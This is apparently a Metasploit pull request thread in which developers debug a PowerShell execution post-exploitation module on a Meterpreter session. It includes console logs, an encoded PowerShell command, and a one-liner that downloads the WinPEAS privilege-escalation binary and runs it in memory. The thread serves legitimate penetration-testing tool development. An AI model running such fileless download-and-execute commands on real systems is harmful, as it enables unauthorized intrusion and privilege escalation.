Remove errant write_log call and swap to the all-in-one psh_exec rath…

[bwatters-r7]

In playing with #20208, I wondered why we did not just run the PowerShell script directly in memory, so I tried it, and it failed:

msf post(windows/manage/powershell/exec_powershell) > run
[*] $url = "https://github.com/peass-ng/PEASS-ng/releases/latest/download/winPEASany_ofs.exe"
$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "$url" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main("")


[*] Compressing script contents.
[+] Compressed size: 609
[*] Executing the script.
[+] EXECUTING:
powershell.exe -EncodedCommand JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcASAA0AHMASQBBAEkAdgAyAGcARwBnAEMAQQB5ADEATwBQAFcAdgBEAE0AQgBEAGQALwBTAHUARQA4AEcAQQBQAHQAbgBhAFgARABHAG4ASgBFAEcAaQBwAGkAUwBrAGQAagBDAG0AeQBmAFYASABVADIAaQBkAFYAZAAyAGsAaQA2AEkAJwArACcAKwB2AEQASgAzAGUANAA5ADcASAB2AGQAeAA0AHMAUgBQAHkAdwB1AHkAcABVAGMAcABZAHYAbAB6AEgAZQBuAEsAcgA4AHEAQwBKAEsAagBTAHEAUABlAHkANwBiAGkATQBCAGwAbgB7ADIAfQBEAFUAbwB0AG0ASQBGAGEAegB1ACsASABpADkASwB4AHUARgBqAGUAVAB4AHYAagB7ADMAfQB6AGwAVABEAEgAVwBTAFcAQgArAFoAZAAzADAAVgBpAFcATwBzAFQAbgBCAGUAWQAyAEQAcQBzADkAMABTAHcAagBrAHMAYwBtAHUAWQB7ADEAfQBaAFkAdAArAGoAQQB6ADkATQBCAFIASAAvAEgARgBmAFUATAAzAEQAZQBJAEwAdgBhACsAbwBYAE0AagBkAGUAaQB1AHEATgA0AEYARwBUAG4AVgBvAGQAeQBLAEkAUgB2ADYAJwArACcASwBEAHIAYQAxADYASABUADgAVABpAE8AcAB3ADkAeAByAG4ATgBqAGcAUABnAGEATgA0AGMAJwArACcAcwBpAEEAWABKAFkAUABvAHYAOQBmAFYAaQBmAFIAQgBMADIAbQBwAHkALwBhAFkAaQBGAGwAbQBXAFYALwBLAHYAJwArACcAbQBvAFYAUABzAEEAQQBBAEEAewAwAH0AJwApAC0AZgAnAD0AJwAsACcANQAnACwAJwBRACcALAAnAGgAJwApACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApAGUAYwBoAG8AIAAnAHMAbQBzAFoAUQBBAGkAUQAnADsA -InputFormat None
[*] Logging output to /home/tmoose/.msf4/logs/scripts/WIN10_21H2_6CFD/winpeas_load-20250723:094947.txt.
[-] Post failed: NoMethodError undefined method `write_to_log' for #<Module:post/windows/manage/powershell/exec_powershell datastore=[#
...

I pulled the write_to_log out and replaced the call to execute_script with psh_exec since that method seemed to do everything automagically.
If anyone knows where the write_to_log method went or a better way to get execute_sccript to work.

The script I used for testing was WinPEASS:

moose@ubuntu-dev2024:~$ cat winpeas_load.ps1 
$url = "https://github.com/peass-ng/PEASS-ng/releases/latest/download/winPEASany_ofs.exe"
$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "$url" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main("")

[bwatters-r7]

Win 10x64 21H2 with admin Meterpreter Session

msf post(windows/manage/powershell/exec_powershell) > use post/windows/manage/powershell/exec_powershell 
msf post(windows/manage/powershell/exec_powershell) > show options

Module options (post/windows/manage/powershell/exec_powershell):

   Name     Current Setting                                                           Required  Description
   ----     ---------------                                                           --------  -----------
   SCRIPT   /home/tmoose/rapid7/metasploit-framework/data/post/powershell/msflag.ps1  yes       Path to the local PS script
   SESSION                                                                            yes       The session to run this module on


View the full module info with the info, or info -d command.

msf post(windows/manage/powershell/exec_powershell) > set session 1
session => 1
msf post(windows/manage/powershell/exec_powershell) > set script /home/tmoose/winpeas_load.ps1
script => /home/tmoose/winpeas_load.ps1
msf post(windows/manage/powershell/exec_powershell) > set Powershell::Post::Timeout 600
Powershell::Post::Timeout => 600
msf post(windows/manage/powershell/exec_powershell) > run
[*] $url = "https://github.com/peass-ng/PEASS-ng/releases/latest/download/winPEASany_ofs.exe"
$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "$url" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main("")


[*] Compressing script contents.
[+] Compressed size: 621
[*] Executing the script.
[+] Compressed size: 2632
[*] <Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
.
.
.
[!] If you want to run the file analysis checks (search sensitive information in files), you need to specify the 'fileanalysis' or 'all' argument. Note that this search might take several minutes. For help, run winpeass.exe --help
ANSI color bit for Windows is not set. If you are executing this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
Long paths are disabled, so the maximum length of a path supported is 260 chars (this may cause false negatives when looking for files). If you are admin, you can enable it with 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
     
               ((((((((((((((((((((((((((((((((
        (((((((((((((((((((((((((((((((((((((((((((
      ((((((((((((((**********/##########(((((((((((((   
    ((((((((((((********************/#######(((((((((((
    ((((((((******************/@@@@@/****######((((((((((
    ((((((********************@@@@@@@@@@/***,####((((((((((
    (((((********************/@@@@@%@@@@/********##(((((((((
    (((############*********/%@@@@@@@@@/************((((((((
    ((##################(/******/@@@@@/***************((((((
    ((#########################(/**********************(((((
    ((##############################(/*****************(((((
    ((###################################(/************(((((
    ((#######################################(*********(((((
    ((#######(,.***.,(###################(..***.*******(((((
    ((#######*(#####((##################((######/(*****(((((
    ((###################(/***********(##############()(((((
    (((#####################/*******(################)((((((
    ((((############################################)((((((
    (((((##########################################)(((((((
    ((((((########################################)(((((((
    ((((((((####################################)((((((((
    (((((((((#################################)(((((((((
        ((((((((((##########################)(((((((((
              ((((((((((((((((((((((((((((((((((((((
                 ((((((((((((((((((((((((((((((

[bwatters-r7]

As a question to the powershellers out there..... what is the difference between this script and https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/manage/exec_powershell.rb ?
Looks like this has a few more features, but I'm not sure why we have both?

[msutovsky-r7]

So I think write_to_log was removed in this commit and seems to be replaced with get_ps_output? The post/windows/manage/powershell/exec_powershell has been added in commit 125aa43, while the post/windows/manage/exec_powershell has been added in 27e1275. From what I understand, the latter has been added as part of some new thing that required Powershell and the former has been part of Powershell execution changes. Also the former seems to supported larger script execution, using compression, the latter does not. I'm not entirely sure, but I don't think we need post/windows/manage/exec_powershell, I haven't come across a place where it would be used.

[msutovsky-r7]

The module will fail if Powershell script is taking too long and timeout is not increased:

msf post(windows/manage/powershell/exec_powershell) > run
[*] $url = "https://github.com/peass-ng/PEASS-ng/releases/latest/download/winPEASany_ofs.exe"
$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "$url" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main("")


[*] Compressing script contents.
[+] Compressed size: 617
[*] Executing the script.
[+] Compressed size: 2608
[-] Post failed: NoMethodError undefined method `strip' for nil:NilClass
[-] Call stack:
[-]   /home/ms/git/metasploit-framework/lib/msf/core/post/windows/powershell.rb:356:in `psh_exec'
[-]   /home/ms/git/metasploit-framework/modules/post/windows/manage/powershell/exec_powershell.rb:120:in `run'
[*] Post module execution completed

Should we adjust this with rescue block, fixing the library where the fail happens (ps_output = ps_output[/#{start}(.*?)#{stop}/m, 1].strip in lib/msf/core/post/windows/powershell.rb - strip is not defined for nil) or leave it up to user?

With timeout increased, works as expected:

msf post(windows/manage/powershell/exec_powershell) > run verbose=true 
[*] $url = "https://github.com/peass-ng/PEASS-ng/releases/latest/download/winPEASany_ofs.exe"
$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "$url" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main("")


[*] Compressing script contents.
[+] Compressed size: 613
[*] Executing the script.
[+] Compressed size: 2592
    
               ((((((((((((((((((((((((((((((((
        (((((((((((((((((((((((((((((((((((((((((((
      ((((((((((((((**********/##########(((((((((((((   
    ((((((((((((********************/#######(((((((((((
    ((((((((******************/@@@@@/****######((((((((((
    ((((((********************@@@@@@@@@@/***,####((((((((((
    (((((********************/@@@@@%@@@@/********##(((((((((
    (((############*********/%@@@@@@@@@/************((((((((
    ((##################(/******/@@@@@/***************((((((
    ((#########################(/**********************(((((
    ((##############################(/*****************(((((
    ((###################################(/************(((((
    ((#######################################(*********(((((
    ((#######(,.***.,(###################(..***.*******(((((
    ((#######*(#####((##################((######/(*****(((((
    ((###################(/***********(##############()(((((
    (((#####################/*******(################)((((((
    ((((############################################)((((((
    (((((##########################################)(((((((
    ((((((########################################)(((((((
    ((((((((####################################)((((((((
    (((((((((#################################)(((((((((
        ((((((((((##########################)(((((((((
              ((((((((((((((((((((((((((((((((((((((
                 ((((((((((((((((((((((((((((((


[SNIPPED]